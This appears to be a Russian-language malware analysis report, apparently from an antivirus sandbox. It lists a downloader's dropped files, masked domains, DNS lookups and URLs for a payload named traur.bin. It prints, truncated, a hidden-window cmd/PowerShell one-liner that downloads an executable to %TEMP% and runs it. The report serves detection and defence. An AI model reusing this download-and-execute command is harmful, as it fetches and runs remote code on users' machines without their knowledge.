Техническая информация
- $ssozlhtgfg как %temp%\whubeutdeo.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Vph0([String] $ssozlhtgfg){(New-Object System.Net.WebClient).DownloadFile($ssozlhtgfg,''%TEMP%\Whubeutdeo.exe'');Start-Process ''%TEMP%\Whubeutdeo.exe'';}t...
- %TEMP%\ztvsu.bat
- %TEMP%\whubeutdeo.exe
- 'ca####delteatro.it':80
- 'rs###tria.com':80
- http://ca####delteatro.it/traur.bin
- http://rs###tria.com/traur.bin
- http://www.rs###tria.com/traur.bin
- DNS ASK ca####delteatro.it
- DNS ASK rs###tria.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Vph0([String] $ssozlhtgfg){(New-Object System.Net.WebClient).DownloadFile($ssozlhtgfg,''%TEMP%\Whubeutdeo.exe'');Start-Process ''%TEMP%\Whubeutdeo.exe'';}t...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ztvsu.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ztvsu.bat" "